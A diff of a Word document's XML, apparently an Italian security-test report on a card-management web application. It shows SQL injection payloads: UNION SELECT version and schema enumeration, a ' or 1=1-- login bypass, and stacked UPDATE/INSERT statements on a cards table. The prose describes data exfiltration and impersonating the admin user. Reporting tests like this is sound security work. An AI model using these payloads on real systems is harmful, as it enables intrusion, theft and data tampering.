-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>ExpiryDate</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>-4-0</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-            </w:tr>
-            <w:tr>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="3148" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>public-</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                      <w:lang w:val="en-US"/>
-                    </w:rPr>
-                    <w:t>Cards</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="2409" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>2001-01-01</w:t>
-                  </w:r>
-                </w:p>
-              </w:tc>
-              <w:tc>
-                <w:tcPr>
-                  <w:tcW w:w="3233" w:type="dxa"/>
-                </w:tcPr>
-                <w:p>
-                  <w:pPr>
-                    <w:jc w:val="left"/>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                  </w:pPr>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>Issuer</w:t>
-                  </w:r>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                    </w:rPr>
-                    <w:t>--1-0</w:t>
+                    <w:t>Issuer--1-0</w:t>
                   </w:r>
                 </w:p>
               </w:tc>
@@ -5234,23 +4966,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>' UNION ALL SELECT @@</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>version,null</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>,'2001-01-02',1,''--</w:t>
+              <w:t>' UNION ALL SELECT @@version,null,'2001-01-02',1,''--</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5292,45 +5008,12 @@
               <w:t xml:space="preserve">' UNION ALL SELECT </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>null,null</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>,</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>null,null</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>,</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>version</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>null,null,null,null,version</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -5338,15 +5021,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>),</w:t>
+              <w:t>(),</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5564,23 +5239,7 @@
                       <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                       <w:lang w:val="en-US"/>
                     </w:rPr>
-                    <w:t>PostgreSQL 18.0 (Debian 18.0-</w:t>
-                  </w:r>
-                  <w:proofErr w:type="gramStart"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                      <w:lang w:val="en-US"/>
-                    </w:rPr>
-                    <w:t>1.pgdg</w:t>
-                  </w:r>
-                  <w:proofErr w:type="gramEnd"/>
-                  <w:r>
-                    <w:rPr>
-                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                      <w:lang w:val="en-US"/>
-                    </w:rPr>
-                    <w:t xml:space="preserve">13+3) on x86_64-pc-linux-gnu, compiled by </w:t>
+                    <w:t xml:space="preserve">PostgreSQL 18.0 (Debian 18.0-1.pgdg13+3) on x86_64-pc-linux-gnu, compiled by </w:t>
                   </w:r>
                   <w:proofErr w:type="spellStart"/>
                   <w:r>
@@ -5684,15 +5343,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">L’esfiltrazione dei dati è stata eseguita nel momento stesso in cui sono riuscito a bypassare </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>la login</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in quanto potev</w:t>
+        <w:t xml:space="preserve">L’esfiltrazione dei dati è stata eseguita nel momento stesso in cui </w:t>
+      </w:r>
+      <w:r>
+        <w:t>siamo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> riuscito a bypassare la login in quanto potev</w:t>
       </w:r>
       <w:r>
         <w:t>amo</w:t>
@@ -5709,10 +5366,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Abbiamo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> provato di nuovo a impersonare l’utente admin con la seguente query usando molte variazioni di ‘admin’.</w:t>
+        <w:t>Abbiamo provato di nuovo a impersonare l’utente admin con la seguente query usando molte variazioni di ‘admin’.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6026,23 +5680,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">' </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>or</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 1=1--</w:t>
+              <w:t>' or 1=1--</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6121,7 +5759,25 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> query. Sono riuscito a inserire una nuova carta, aggiornare una esistente e cancellarne una. Il tutto con l’utente amministratore che era l’unico ad avere i privilegi per eseguire queste operazioni. Contando che non c’erano dati </w:t>
+        <w:t xml:space="preserve"> query. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Siamo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> riuscit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a inserire una nuova carta, aggiornare una esistente e cancellarne una. Contando che non c’erano </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tabelle</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>relativi ai</w:t>
@@ -6130,6 +5786,9 @@
         <w:t xml:space="preserve"> ruoli</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> degli utenti</w:t>
+      </w:r>
+      <w:r>
         <w:t>,</w:t>
       </w:r>
       <w:r>
@@ -6147,7 +5806,10 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>’ con un controllo direttamente nel codice.</w:t>
+        <w:t>’ con un controllo direttamente nel codice</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> oppure che non ci fosse proprio un controllo.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6182,21 +5844,12 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>';UPDATE</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> cards SET code='000'--</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>';UPDATE cards SET code='000'--</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6216,21 +5869,12 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>';INSERT</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> INTO cards </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">';INSERT INTO cards </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6364,7 +6008,13 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -6482,24 +6132,312 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">' union all </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">SELECT </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  SCHEMA_NAME(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>p.schema_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">)+'-'+p.name, </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  null,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  '2001-01-01',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  1,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  ISNULL(par.name, 'np') + '-' +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  ISNULL(TYPE_NAME(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>par.user_type_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>), '') + '-' +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  CONVERT(varchar, ISNULL(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>par.max_length</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, 0)) </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">FROM </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.procedures</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> p </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.schemas</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> s </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.schema_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>p.schema_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> AND s.name= '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>dbo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t xml:space="preserve">' </w:t>
             </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>union</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> all </w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6514,7 +6452,23 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">SELECT </w:t>
+              <w:t xml:space="preserve">LEFT JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.parameters</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> par </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6530,32 +6484,15 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">  SCHEMA_NAME(</w:t>
+              <w:t xml:space="preserve">     ON </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>p.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>par.object_id</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -6563,15 +6500,39 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>)+</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">'-'+p.name, </w:t>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>p.object_id</w:t>
+            </w:r>
